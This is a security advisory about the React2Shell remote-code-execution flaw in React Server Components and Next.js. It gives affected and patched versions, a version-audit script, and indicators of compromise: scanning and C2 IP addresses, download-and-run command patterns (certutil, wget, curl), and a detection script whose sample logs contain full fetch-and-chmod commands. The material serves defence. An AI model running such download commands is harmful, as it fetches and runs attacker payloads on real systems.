Patch Immediately: Critical Vulnerability Dubbed 'React2Shell'

On December 4, Coalition notified impacted policyholders about CVE-2025-55182, a critical deserialization vulnerability in React Server Components and Next.js applications that allows unauthenticated remote code execution (RCE), enabling attackers to take control of the affected system.
This vulnerability, colloquially known as React2Shell, has received a maximum severity CVSS score of 10.0. There are now working proofs of concept (PoCs), and attacks reported in the wild. This is highly dangerous because RCE on an application server is a straight path to data theft, ransomware staging, and business interruption.
Depending on how a business hosts its application, web application firewall (WAF) rules may block exploitation attempts, but this may require direct action to enable them. Coalition urges policyholders without a WAF to patch immediately to prevent a likely breach. Policyholders with WAF protections should still update applications as soon as possible.
What happened?
On November 29, a researcher reported CVE-2025-55182, an RCE vulnerability in React and Next.js applications.
React, a widely used, open-source JavaScript library for front-end web development, is maintained by Meta and utilized by organizations globally. Next.js, maintained by Vercel, is a React-based framework. It extends React's capabilities by adding features such as server-side rendering, routing, and the creation of API endpoints.
The issue stems from React Server Components (RSC), used by default in Next.js applications and sometimes in React applications, which contain vulnerable code that unsafely deserializes payloads from HTTP requests to Server Function endpoints.
The affected versions are:
>= 14.3.0-canary.77
>= 15.x
>= 16.x
Within hours of the vulnerability’s disclosure, cloud providers and threat intel teams reported active exploitation, including Chinese state-linked groups targeting internet-facing systems. Large cloud infrastructure providers like Cloudflare have had service disruptions while deploying the urgent mitigations.
This vulnerability shares some of the hallmarks of the 2021 vulnerability, Log4Shell (CVE-2021-44228), which led to hundreds of ransomware attacks and had lasting impacts.
How do businesses address this?
To mitigate this vulnerability, it is critical that businesses update their Next.js systems to a patched version:
15.0.5
15.1.9
15.3.6
15.4.8
15.5.7
16.0.7
The vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or to 14.3.0-canary.76.
It is imperative that all businesses patch as quickly as possible.
For businesses that are not using Next.js but are using RSC directly, update the following components:
react-server-dom-parcel
react-server-dom-turbopack
react-server-dom-webpack
Affected versions of these components are 19.0.0, 19.1.0, 19.1.1, and 19.2.0. These components must be updated to one of the following patched versions:
19.0.1
19.1.2
19.2.1
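The two update procedures above (Next.js release lines and the react-server-dom-* packages) reduce to a version comparison against the lists in this post. The following Node.js script is an added example, not Coalition's, React's or Next.js's own tooling: it classifies exact installed versions (as read from a lockfile or `npm ls --json`, not package.json ranges) against the affected and patched releases named here. The sample installed tree is constructed, and the 'verify' status for release lines this post does not list (for example 15.2.x) is this example's own conservative choice.

```javascript
// Added example (not Coalition's, React's or Next.js's own code): classify
// installed Next.js and react-server-dom-* versions against the affected and
// patched releases named in this advisory. Exact installed versions are
// expected (as in a lockfile or `npm ls --json`), not package.json ranges.

// Patched Next.js releases from the advisory, keyed by release line.
const NEXT_PATCHED = {
  '15.0': '15.0.5', '15.1': '15.1.9', '15.3': '15.3.6',
  '15.4': '15.4.8', '15.5': '15.5.7', '16.0': '16.0.7',
};
// React Server Components packages and versions from the advisory.
const RSC_PACKAGES = new Set([
  'react-server-dom-parcel', 'react-server-dom-turbopack', 'react-server-dom-webpack',
]);
const RSC_AFFECTED = new Set(['19.0.0', '19.1.0', '19.1.1', '19.2.0']);
const RSC_PATCHED = new Set(['19.0.1', '19.1.2', '19.2.1']);

// Parse "major.minor.patch[-prerelease]"; returns null for anything else.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(String(v).trim());
  return m ? { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null } : null;
}

// Compare major.minor.patch only (pre-release tags are handled separately).
function cmpCore(a, b) {
  return (a.major - b.major) || (a.minor - b.minor) || (a.patch - b.patch);
}

// Status values: 'patched', 'affected', 'not-affected', 'verify' (release line
// not listed in the advisory; assumption: treat as needing manual confirmation).
function assessNext(version) {
  const v = parseVersion(version);
  if (!v) return { status: 'verify', reason: `unparseable version "${version}"` };
  if (v.major < 14) return { status: 'not-affected', reason: 'below the affected range' };
  if (v.major === 14) {
    // Only 14.3.0-canary.77 and later canaries of that line are affected.
    const c = v.pre && /^canary\.(\d+)$/.exec(v.pre);
    const affected = v.minor === 3 && v.patch === 0 && c && +c[1] >= 77;
    return affected
      ? { status: 'affected', reason: 'canary build >= 14.3.0-canary.77' }
      : { status: 'not-affected', reason: '14.x stable or canary <= 14.3.0-canary.76' };
  }
  if (v.pre) return { status: 'affected', reason: 'pre-release build on an affected major line' };
  const fixed = NEXT_PATCHED[`${v.major}.${v.minor}`];
  if (!fixed) return { status: 'verify', reason: `no patched release listed for ${v.major}.${v.minor}.x` };
  return cmpCore(v, parseVersion(fixed)) >= 0
    ? { status: 'patched', reason: `>= ${fixed}` }
    : { status: 'affected', reason: `below ${fixed}` };
}

// Exact-match check for the react-server-dom-* packages; null for other packages.
function assessRsc(name, version) {
  if (!RSC_PACKAGES.has(name)) return null;
  if (RSC_PATCHED.has(version)) return { status: 'patched', reason: 'listed patched release' };
  if (RSC_AFFECTED.has(version)) return { status: 'affected', reason: 'listed affected release' };
  return { status: 'verify', reason: 'version not listed in the advisory' };
}

// Walk a name -> exact version map and return everything not clearly patched or unaffected.
function auditInstalled(installed) {
  const findings = [];
  for (const [name, version] of Object.entries(installed)) {
    const r = name === 'next' ? assessNext(version) : assessRsc(name, version);
    if (r && r.status !== 'patched' && r.status !== 'not-affected') findings.push({ name, version, ...r });
  }
  return findings;
}

// Constructed sample of an installed tree (not taken from any real project).
const SAMPLE_INSTALLED = { next: '15.4.2', react: '19.1.1', 'react-server-dom-webpack': '19.1.1' };

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditInstalled(SAMPLE_INSTALLED)) {
    console.log(`${f.name}@${f.version}: ${f.status} (${f.reason})`);
  }
}
```

Run it against the output of `npm ls --json --depth=0` after mapping each dependency to its resolved `version`; anything reported as 'affected' or 'verify' should be updated to one of the patched releases listed above before the application is exposed again.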
Businesses with a WAF must ensure that its protections are enabled. Businesses that do not have a WAF and cannot update must take the application down until they can apply the update.
Who's at risk?
This vulnerability could be massively damaging because 1) React and Next.js are downloaded a combined total of more than 72 million times weekly, and 2) the vulnerability is simple to exploit.
Open-source code is a critical component of many organizations’ digital infrastructure. That’s why, when JavaScript libraries like these are exploited, the consequences can ripple throughout the software supply chain, leading to risk aggregation.
Among Coalition policyholders notified about this vulnerability, businesses in the software and services (15%), professional services (11%), and hospitality (10%) industries were most impacted. The highest proportion of impacted policyholders had fewer than 50 employees (72%) and were small to midsize businesses by revenue (94%).
Coalition has observed specific IP addresses scanning for the vulnerability and exploiting it in the wild. The tactics, techniques, and procedures (TTPs) observed are listed at the bottom of this post.
How is Coalition responding?
Coalition has notified any impacted policyholders. Coalition policyholders can log in to Coalition Control® for the latest updates. Coalition also recommends that policyholders follow the latest guidance from React.
We continue to monitor the situation closely. For assistance with mitigation, contact Coalition’s Security Support Center at securitysupport@coalitioninc.com.
TTPs
IP addresses observed scanning and exploiting
115.42.60.223
116.87.135.182
14.31.16.65
154.84.56.13
172.86.73.107
176.133.103.26
184.180.213.240
188.148.152.34
193.142.147.209
194.195.253.210
27.109.140.103
45.140.169.184
52.221.210.62
61.239.21.59
64.111.93.13
65.49.1.162
65.49.1.66
73.9.48.144
95.214.52.170
IP addresses hosting C2s
115.42.60.223
154.84.56.4
31.56.27.76
45.76.155.14
94.154.35.154
Patterns
certutil.exe -urlcache -split -f http://<ip>/file
wget http://<ip>/malware
wget http://<ip>/vim
busybox wget http://<ip>...
curl http://<ip>...
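The indicators above can be turned into a simple detection pass over endpoint process logs and web-server access logs. The script below is an added example for defenders, not Coalition's own tooling: it flags command lines that use the download tools in the pattern list to fetch from a listed indicator address or from a bare IP address (every pattern above fetches from `http://<ip>/`), and access-log lines whose client address is one of the listed scanning or C2 IPs. The indicator sets are copied from the lists above (the full C2 list and a subset of the scanning list), the sample log lines are constructed, `198.51.100.7` is a documentation-range placeholder rather than an indicator, and the severity tiers are this example's own choice.

```javascript
// Added example (not Coalition's own tooling): flag process command lines and
// web access-log entries that match the post-exploitation download patterns and
// IP addresses listed in this advisory. Sample log lines below are constructed;
// 198.51.100.7 is a documentation-range placeholder, not an indicator.

// Indicators copied from the advisory's TTP lists (scanning list is a subset).
const SCANNING_IPS = new Set([
  '115.42.60.223', '116.87.135.182', '14.31.16.65', '154.84.56.13',
  '193.142.147.209', '45.140.169.184', '95.214.52.170',
]);
const C2_IPS = new Set(['115.42.60.223', '154.84.56.4', '31.56.27.76', '45.76.155.14', '94.154.35.154']);
const IOC_IPS = new Set([...SCANNING_IPS, ...C2_IPS]);

// Download tools from the advisory's "Patterns" list, most specific first so
// "busybox wget" is reported as such rather than as plain wget.
const TOOL_PATTERNS = [
  { tool: 'certutil-urlcache', re: /\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b/i },
  { tool: 'busybox-wget', re: /\bbusybox\s+wget\b/i },
  { tool: 'wget', re: /(?:^|[\s;|&("'])wget\b/i },
  { tool: 'curl', re: /(?:^|[\s;|&("'])curl\b/i },
];
const URL_RE = /https?:\/\/([^\/\s:"']+)(?::\d+)?[^\s"']*/i; // captures the host
const IP_LITERAL = /^\d{1,3}(?:\.\d{1,3}){3}$/;

// Returns a finding or null. Severity tiers are this example's own choice:
// 'high' when the download host is a listed indicator, 'medium' when the host
// is a bare IP literal, and no finding for ordinary downloads from a hostname.
function analyzeCommandLine(cmd) {
  const match = TOOL_PATTERNS.find((p) => p.re.test(cmd));
  if (!match) return null;
  const url = URL_RE.exec(cmd);
  if (!url) return null;
  const host = url[1];
  if (IOC_IPS.has(host)) {
    return { tool: match.tool, host, url: url[0], severity: 'high', reason: 'host is a listed indicator' };
  }
  if (IP_LITERAL.test(host)) {
    return { tool: match.tool, host, url: url[0], severity: 'medium', reason: 'download from a bare IP address' };
  }
  return null;
}

// Common/combined log format: the client address is the first field.
function analyzeAccessLine(line) {
  const ip = line.trim().split(/\s+/)[0];
  if (!IOC_IPS.has(ip)) return null;
  const reason = SCANNING_IPS.has(ip) ? 'listed scanning/exploitation source' : 'listed C2 host';
  return { ip, severity: 'high', reason };
}

function scanProcessLogs(lines) {
  return lines.map(analyzeCommandLine).filter(Boolean);
}

// Constructed sample data (not captured from any real system).
const SAMPLE_PROCESS_LINES = [
  'sh -c "wget http://45.76.155.14/vim -O /tmp/vim && chmod +x /tmp/vim"',
  'certutil.exe -urlcache -split -f http://198.51.100.7/file C:\\Users\\Public\\file.exe',
  'curl https://registry.npmjs.org/next',
  'busybox wget http://94.154.35.154/x',
];
const SAMPLE_ACCESS_LINE =
  '115.42.60.223 - - [05/Dec/2025:10:00:00 +0000] "POST / HTTP/1.1" 500 12 "-" "curl/8.0"';

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanProcessLogs(SAMPLE_PROCESS_LINES)) {
    console.log(`[${f.severity}] ${f.tool} -> ${f.host} (${f.reason})`);
  }
  const a = analyzeAccessLine(SAMPLE_ACCESS_LINE);
  if (a) console.log(`[${a.severity}] client ${a.ip} (${a.reason})`);
}
```

The command-line check is deliberately narrow: `curl` and `wget` are everyday tools, so only fetches from an indicator address or a bare IP are surfaced, which keeps the output reviewable on a busy host. Because the scanning list only identifies sources, an access-log hit should be read as "this address is worth investigating", not as proof of compromise; correlate it with process findings on the same host.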